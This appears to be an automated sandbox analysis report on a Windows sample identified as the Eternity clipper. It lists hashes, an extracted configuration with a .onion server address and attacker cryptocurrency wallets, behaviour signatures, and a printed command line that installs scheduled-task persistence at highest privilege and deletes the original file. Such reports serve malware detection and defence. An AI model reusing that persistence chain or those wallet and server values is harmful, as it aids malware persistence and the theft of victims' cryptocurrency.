Analysis
-
max time kernel
113s -
max time network
145s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
17-11-2022 09:46
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20221111-en
General
-
Target
file.exe
-
Size
10.0MB
-
MD5
71438bae518e4e312e1f6617ee0b268b
-
SHA1
744f042e3b251786d7d15c960b93d7da83f75773
-
SHA256
2e0407e923bff9826e61900e5c1addaf13e226564796527e83bc0384adb16ec8
-
SHA512
6128bcdaf3006757b3a7f13f30bb07c91ade97214807e56f15df0fc20b4d45b44a0ba5cb73140aec9c6c5f4eb596219c9e5f897cccd07de6447780a6e677adaf
-
SSDEEP
24576:LvtObzeG41/7E6E9h1hqmS10mSVBojjIY+SzsS:hOWVpX8V+48zsS
Malware Config
Extracted
eternity
http://eternityms33k74r7iuuxfda4sqsiei3o3lbtr5cpalf6f4skszpruad.onion
41r3LwMnez561bPJdamkzFfVoUJhmJQjHXSGz2e1Cb8xBCgvvSN36REatA7Ayn2GubDXyE2SQsar4LJDTAr8DnwPSmViy7o
1NSf3HSaEVJQv82Wg1Dxwrq8vksbXk1Uz9
0x5296E7a3aBa03B60e9ab2fF31Bc4Bda5C4306E70
0x5296E7a3aBa03B60e9ab2fF31Bc4Bda5C4306E70
0x5296E7a3aBa03B60e9ab2fF31Bc4Bda5C4306E70
0x5296E7a3aBa03B60e9ab2fF31Bc4Bda5C4306E70
0x5296E7a3aBa03B60e9ab2fF31Bc4Bda5C4306E70
D8JaQ1S56v9q1PYvgiMSiJKcpr62rzNmPP
TGPdhxdT1AdFBy9ojeACoPDhGG9BJsDRcG
t1V7NEnYmdnGVMFE7nLmW9r1DxnvBdZEcuu
XpTXPMSoGXwsHWs1h9fnUTDo2HfJbXyzqk
Signatures
-
Detects Eternity clipper 1 IoCs
Processes:
resource yara_rule behavioral2/memory/4976-136-0x0000000000400000-0x0000000000410000-memory.dmp eternity_clipper -
Eternity
Eternity Project is a malware kit offering an info stealer, clipper, worm, coin miner, ransomware, and DDoS bot.
-
Executes dropped EXE 6 IoCs
Processes:
file.exefile.exefile.exefile.exefile.exefile.exepid process 4896 file.exe 2448 file.exe 4552 file.exe 2268 file.exe 4076 file.exe 1948 file.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
file.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation file.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 10 ip-api.com -
Suspicious use of SetThreadContext 4 IoCs
Processes:
file.exefile.exefile.exefile.exedescription pid process target process PID 4624 set thread context of 4976 4624 file.exe file.exe PID 4896 set thread context of 2448 4896 file.exe file.exe PID 4552 set thread context of 2268 4552 file.exe file.exe PID 4076 set thread context of 1948 4076 file.exe file.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
file.exepid process 2448 file.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
file.exefile.exefile.exefile.exefile.exedescription pid process Token: SeDebugPrivilege 4624 file.exe Token: SeDebugPrivilege 4896 file.exe Token: SeDebugPrivilege 2448 file.exe Token: SeDebugPrivilege 4552 file.exe Token: SeDebugPrivilege 4076 file.exe -
Suspicious use of WriteProcessMemory 47 IoCs
Processes:
file.exefile.execmd.exefile.exefile.exefile.exedescription pid process target process PID 4624 wrote to memory of 4976 4624 file.exe file.exe PID 4624 wrote to memory of 4976 4624 file.exe file.exe PID 4624 wrote to memory of 4976 4624 file.exe file.exe PID 4624 wrote to memory of 4976 4624 file.exe file.exe PID 4624 wrote to memory of 4976 4624 file.exe file.exe PID 4624 wrote to memory of 4976 4624 file.exe file.exe PID 4624 wrote to memory of 4976 4624 file.exe file.exe PID 4624 wrote to memory of 4976 4624 file.exe file.exe PID 4976 wrote to memory of 4676 4976 file.exe cmd.exe PID 4976 wrote to memory of 4676 4976 file.exe cmd.exe PID 4976 wrote to memory of 4676 4976 file.exe cmd.exe PID 4676 wrote to memory of 4276 4676 cmd.exe chcp.com PID 4676 wrote to memory of 4276 4676 cmd.exe chcp.com PID 4676 wrote to memory of 4276 4676 cmd.exe chcp.com PID 4676 wrote to memory of 4924 4676 cmd.exe PING.EXE PID 4676 wrote to memory of 4924 4676 cmd.exe PING.EXE PID 4676 wrote to memory of 4924 4676 cmd.exe PING.EXE PID 4676 wrote to memory of 4716 4676 cmd.exe schtasks.exe PID 4676 wrote to memory of 4716 4676 cmd.exe schtasks.exe PID 4676 wrote to memory of 4716 4676 cmd.exe schtasks.exe PID 4676 wrote to memory of 4896 4676 cmd.exe file.exe PID 4676 wrote to memory of 4896 4676 cmd.exe file.exe PID 4676 wrote to memory of 4896 4676 cmd.exe file.exe PID 4896 wrote to memory of 2448 4896 file.exe file.exe PID 4896 wrote to memory of 2448 4896 file.exe file.exe PID 4896 wrote to memory of 2448 4896 file.exe file.exe PID 4896 wrote to memory of 2448 4896 file.exe file.exe PID 4896 wrote to memory of 2448 4896 file.exe file.exe PID 4896 wrote to memory of 2448 4896 file.exe file.exe PID 4896 wrote to memory of 2448 4896 file.exe file.exe PID 4896 wrote to memory of 2448 4896 file.exe file.exe PID 4552 wrote to memory of 2268 4552 file.exe file.exe PID 4552 wrote to memory of 2268 4552 file.exe file.exe PID 4552 wrote to memory of 2268 4552 file.exe file.exe PID 4552 wrote to memory of 2268 4552 file.exe file.exe PID 4552 wrote to memory of 2268 4552 file.exe file.exe PID 4552 wrote to memory of 2268 4552 file.exe file.exe PID 4552 wrote to memory of 2268 4552 file.exe file.exe PID 4552 wrote to memory of 2268 4552 file.exe file.exe PID 4076 wrote to memory of 1948 4076 file.exe file.exe PID 4076 wrote to memory of 1948 4076 file.exe file.exe PID 4076 wrote to memory of 1948 4076 file.exe file.exe PID 4076 wrote to memory of 1948 4076 file.exe file.exe PID 4076 wrote to memory of 1948 4076 file.exe file.exe PID 4076 wrote to memory of 1948 4076 file.exe file.exe PID 4076 wrote to memory of 1948 4076 file.exe file.exe PID 4076 wrote to memory of 1948 4076 file.exe file.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "file" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\file.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\file.exe" &&START "" "C:\Users\Admin\AppData\Local\ServiceHub\file.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\chcp.comchcp 650014⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.14⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "file" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\file.exe" /rl HIGHEST /f4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\ServiceHub\file.exe"C:\Users\Admin\AppData\Local\ServiceHub\file.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\ServiceHub\file.exe"C:\Users\Admin\AppData\Local\ServiceHub\file.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\ServiceHub\file.exeC:\Users\Admin\AppData\Local\ServiceHub\file.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\ServiceHub\file.exe"C:\Users\Admin\AppData\Local\ServiceHub\file.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\ServiceHub\file.exeC:\Users\Admin\AppData\Local\ServiceHub\file.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\ServiceHub\file.exe"C:\Users\Admin\AppData\Local\ServiceHub\file.exe"2⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.logFilesize
617B
MD5806dff23883c0aa6dcb04133b1380075
SHA1ab9c711b18ac9edbd41966b3495f837746dbc146
SHA256b58a668ac53e656011a581a7c1ce3d763b8120487f3017a5881298a588a34e17
SHA51242ff1897d652e4bf0467e402a9386501810db93d1e18824bb61ec231d50ae9dabed04043cd60996cd508fd3e495825bb02acb5d7619e20773f9bdc5c453017b6
-
C:\Users\Admin\AppData\Local\ServiceHub\file.exeFilesize
10.0MB
MD571438bae518e4e312e1f6617ee0b268b
SHA1744f042e3b251786d7d15c960b93d7da83f75773
SHA2562e0407e923bff9826e61900e5c1addaf13e226564796527e83bc0384adb16ec8
SHA5126128bcdaf3006757b3a7f13f30bb07c91ade97214807e56f15df0fc20b4d45b44a0ba5cb73140aec9c6c5f4eb596219c9e5f897cccd07de6447780a6e677adaf
-
C:\Users\Admin\AppData\Local\ServiceHub\file.exeFilesize
10.0MB
MD571438bae518e4e312e1f6617ee0b268b
SHA1744f042e3b251786d7d15c960b93d7da83f75773
SHA2562e0407e923bff9826e61900e5c1addaf13e226564796527e83bc0384adb16ec8
SHA5126128bcdaf3006757b3a7f13f30bb07c91ade97214807e56f15df0fc20b4d45b44a0ba5cb73140aec9c6c5f4eb596219c9e5f897cccd07de6447780a6e677adaf
-
C:\Users\Admin\AppData\Local\ServiceHub\file.exeFilesize
10.0MB
MD571438bae518e4e312e1f6617ee0b268b
SHA1744f042e3b251786d7d15c960b93d7da83f75773
SHA2562e0407e923bff9826e61900e5c1addaf13e226564796527e83bc0384adb16ec8
SHA5126128bcdaf3006757b3a7f13f30bb07c91ade97214807e56f15df0fc20b4d45b44a0ba5cb73140aec9c6c5f4eb596219c9e5f897cccd07de6447780a6e677adaf
-
C:\Users\Admin\AppData\Local\ServiceHub\file.exeFilesize
10.0MB
MD571438bae518e4e312e1f6617ee0b268b
SHA1744f042e3b251786d7d15c960b93d7da83f75773
SHA2562e0407e923bff9826e61900e5c1addaf13e226564796527e83bc0384adb16ec8
SHA5126128bcdaf3006757b3a7f13f30bb07c91ade97214807e56f15df0fc20b4d45b44a0ba5cb73140aec9c6c5f4eb596219c9e5f897cccd07de6447780a6e677adaf
-
C:\Users\Admin\AppData\Local\ServiceHub\file.exeFilesize
10.0MB
MD571438bae518e4e312e1f6617ee0b268b
SHA1744f042e3b251786d7d15c960b93d7da83f75773
SHA2562e0407e923bff9826e61900e5c1addaf13e226564796527e83bc0384adb16ec8
SHA5126128bcdaf3006757b3a7f13f30bb07c91ade97214807e56f15df0fc20b4d45b44a0ba5cb73140aec9c6c5f4eb596219c9e5f897cccd07de6447780a6e677adaf
-
C:\Users\Admin\AppData\Local\ServiceHub\file.exeFilesize
10.0MB
MD571438bae518e4e312e1f6617ee0b268b
SHA1744f042e3b251786d7d15c960b93d7da83f75773
SHA2562e0407e923bff9826e61900e5c1addaf13e226564796527e83bc0384adb16ec8
SHA5126128bcdaf3006757b3a7f13f30bb07c91ade97214807e56f15df0fc20b4d45b44a0ba5cb73140aec9c6c5f4eb596219c9e5f897cccd07de6447780a6e677adaf
-
C:\Users\Admin\AppData\Local\ServiceHub\file.exeFilesize
10.0MB
MD571438bae518e4e312e1f6617ee0b268b
SHA1744f042e3b251786d7d15c960b93d7da83f75773
SHA2562e0407e923bff9826e61900e5c1addaf13e226564796527e83bc0384adb16ec8
SHA5126128bcdaf3006757b3a7f13f30bb07c91ade97214807e56f15df0fc20b4d45b44a0ba5cb73140aec9c6c5f4eb596219c9e5f897cccd07de6447780a6e677adaf
-
memory/1948-155-0x0000000000000000-mapping.dmp
-
memory/1948-156-0x0000000000400000-0x0000000000410000-memory.dmpFilesize
64KB
-
memory/2268-151-0x0000000000000000-mapping.dmp
-
memory/2448-145-0x0000000000000000-mapping.dmp
-
memory/2448-148-0x0000000007320000-0x00000000073B2000-memory.dmpFilesize
584KB
-
memory/2448-149-0x00000000084C0000-0x00000000084CA000-memory.dmpFilesize
40KB
-
memory/4276-139-0x0000000000000000-mapping.dmp
-
memory/4624-134-0x0000000005EE0000-0x0000000005F7C000-memory.dmpFilesize
624KB
-
memory/4624-132-0x0000000000960000-0x0000000001360000-memory.dmpFilesize
10.0MB
-
memory/4624-133-0x0000000006370000-0x0000000006914000-memory.dmpFilesize
5.6MB
-
memory/4676-138-0x0000000000000000-mapping.dmp
-
memory/4716-141-0x0000000000000000-mapping.dmp
-
memory/4896-142-0x0000000000000000-mapping.dmp
-
memory/4924-140-0x0000000000000000-mapping.dmp
-
memory/4976-135-0x0000000000000000-mapping.dmp
-
memory/4976-136-0x0000000000400000-0x0000000000410000-memory.dmpFilesize
64KB